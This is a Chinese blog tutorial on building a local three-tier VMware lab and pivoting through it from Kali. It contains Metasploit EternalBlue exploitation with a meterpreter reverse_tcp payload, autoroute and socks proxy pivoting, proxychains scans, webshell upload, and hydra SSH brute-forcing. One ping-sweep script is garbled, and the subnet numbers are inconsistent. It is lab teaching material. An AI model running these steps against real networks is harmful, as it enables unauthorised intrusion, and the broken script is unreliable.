本地搭建三层内网,进行内网渗透测试

这篇是去年国庆前写的,推荐给对内网没有任何了解,但是想要了解的同学,也可以自己本地搭建练习下。

场景的简单介绍

这里用VMware进行三层内网的搭建,省略了得到外网机器shell的过程,也省略了外网流量代理和端口转发的过程,直接将攻击机kali与第一层靶机放在了一张网卡上。并进行了以下设置:

一、在虚拟机中新建三张网卡,选择仅主机模式:

二、对机器进行网卡配置:
1.将攻击机kali设为第一层网络vmnet1,在网络适配器中选择自定义vmnet1:


2.将win7,设为第一层靶机,并设置成双网卡

3.将server08,设为第二层靶机,并设置成双网卡

4.将ubuntu,设为第三层靶机,并设置成单网卡

第一层靶机

已知目标IP为192.168.206.143,首先对目标靶机进行指纹识别得出是 Windows系统:

这里推荐nmap的两条命令,内网中常用的命令为nmap -Pn -sT IP,外网中推荐nmap -sS -sV -vv -T4 IP,具体参数含义请自查。

也有很多人比较喜欢用脚本,这里推荐两个比较常用的脚本和一个应用。

工具1
上古神器s.exe,这里就不挂链接了,请自查。

脚本1
RASscan
https://github.com/RASSec/RASscan

脚本2
将下方代码保存为.sh文件,比如 1.sh,执行./1.sh会将扫描结果存放到result.txt文件里,如果运行不了请使用:set ff 或 :set fileformat检查文件格式。

扫描哪些网段有存活主机:

#!/bin/bash
for ip in 192.168.{1..254}.1
do 
    ping $ip -c 1 &> /dev/null 
        if [ $? -eq 0 ];then 
            echo "$ip is alive .... " > ip_result.txt
            echo $ip is alive .... 
        fi 
done

扫描存活主机开放的端口:

#!binbash
for ip in 192.168.1.{1..254} 
do 
    ping $ip -c 1 & devnull 
        if [ $ -eq 0 ];then 
            echo $ip is alive ....   ip_result.txt
            echo $ip is alive .... 
        fi 
done

下面继续靶场操作,对目标进行nmap端口扫描:

这里同时开放了80,445,3306等端口,下面进行渗透,就围绕着几个端口进行。80端口可以找Web漏洞,尝试webshell上传,3306端口可以尝试口令爆破,445端口那第一个想到的就是永恒之蓝了,内网存在MS17-010漏洞的情况并不少见。

检测目标靶机是否具有永恒之蓝漏洞:

use auxiliary/scanner/smb/smb_ms17_010
set rhosts IP
run

可以看到目标靶机确实有永恒之蓝漏洞,接下来我们利用该漏洞获得shell,这里使用的是反向,bind是正向:

use exploit/windows/smb/ms17_010_eternalblue      
set lhost IP                                             
set rhosts IP                                         
set payload windows/x64/meterpreter/reverse_tcp    
run   

这就获得这一层靶机的shell了,下面是第二次靶机的。

第二次靶机

执行run get_local_subnets查看路由,发现第二层网段为:192.168.85.0/24

执行run autoroute -s 网段添加第二层靶机的路由表,执行run autoroute -p查看已添加的路由。这样,通往192.168.85.0/24网段的流量通过meterpreter 的session1进行路由。

然后,我们在MSF中启动socks代理:

msf> use auxiliary/scanner/portscan/tcp  
msf> use auxiliary/server/socks4a
msf> set srvhost 192.168.206.145
msf> set srvport 9999
msf> run

SRVHOST:监听的ip地址,这里设成Kali攻击机的IP

SRVPORT:监听的端口,这里设成Kali攻击机上未开放的端口

设置完成后其他攻击软件可以通过MSF socks代理、添加的路由对第二层渗透。

此时,我们已经可以访问第二层网络192.168.90.0/24了,按照常见的渗透思路,我们会对第二层网络进行扫描探测,看看存活主机有哪些,比如用nmap进行扫描,不过在此之前,我们还需要配置kali中的proxychain,通过proxychain 将nmap的流量通过msf的socks代理,进行第二层的网络扫描。

配置proxychain(下方文件的配置要和msf模块的设置相同)修改 vi /etc/proxychains.conf,将里面的服务器和端口设置为msf socksserver的信息:
此时,我们可以利用nmap进行第二层网络的探测:

然后利用proxychans 启动nmap对第二层靶机进行扫描,这里注意一定要加上-Pn和-sT参数,即不检测主机是否存活,直接进行端口tcp扫描。(因为proxychains无法代理icmp的数据包 )
proxychains nmap -Pn -sT -p80,81,3306,3389,445 192.168.85.149

为kali里的火狐配置socks4代理:

打开81端口访问,发现是Typecho的博客,相关漏洞和poc可以去网上查下,这里是admin/admin等弱口令登陆后台:
然后进行常规的web渗透,上传一句话,连接蚁剑

为kali里的蚁剑配置socks4代理:

连接我们的一句话:

打开终端,查看开放的端口,找个没有用的端口,下面做木马,这里选择4445

由于msf添加的路由全为正向连接,即我们可以访问到靶机但靶机不能反向访问到我们,所以在选择msf马的payload时,不选择reverse_tcp反向连接payload,而是选择bind_tcp正向连接payload,bind_tcp不需要设置请求的ip,会在目标主机开启一个端口,然后我们攻击机去访问目标主机的端口即可攻陷:

将木马文件上传成功后,在此处打开终端,运行木马文件

回到Kali,这里跟上面一样的设置:

run之后,成功接收shell,输入route,发现226网段

第三层靶机

利用这个meterpreter添加到第三层的网络路由,进行二次代理:

run autoroute -s 192.168.226.0/24
runautoroute -p 

在启用一个socks4代理给第三层网络,端口开9998

扫描一下第三层存活的主机:
proxchains nmap -Pn -sT -p 22,80,3389,445,7001 192.168.226.141

这里同时开放了80,22,7001等端口,下面进行渗透,就围绕着几个端口进行。80端口可以找Web漏洞,尝试webshell上传,22端口可以尝试口令爆破,7001可能就是Weblogic漏洞了

利用九头蛇爆破22端口:
proxychains hydra -L '/root/桌面/User.txt' -P '/root/桌面/Password.txt' 192.168.226.141 ssh

重新设置火狐代理访问Web端口,这里的Weblogic有漏洞就不演示了:

至此,本地搭建的内网场景就结束了,谢谢观看,若有疑问请留言,若有错误请指教。

推荐另一篇内网渗透的文章:内网渗透

内网代理的文章:内网代理神器Venom

两篇关于域渗透和金银票据的文章:

Kerberos认证

黄金票据和白银票据攻击原理介绍


大佬随手给个赞呗 0.0

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 158,560评论 4 361
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,104评论 1 291
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,297评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,869评论 0 204
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,275评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,563评论 1 216
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,833评论 2 312
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,543评论 0 197
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,245评论 1 241
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,512评论 2 244
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,011评论 1 258
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,359评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,006评论 3 235
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,062评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,825评论 0 194
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,590评论 2 273
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,501评论 2 268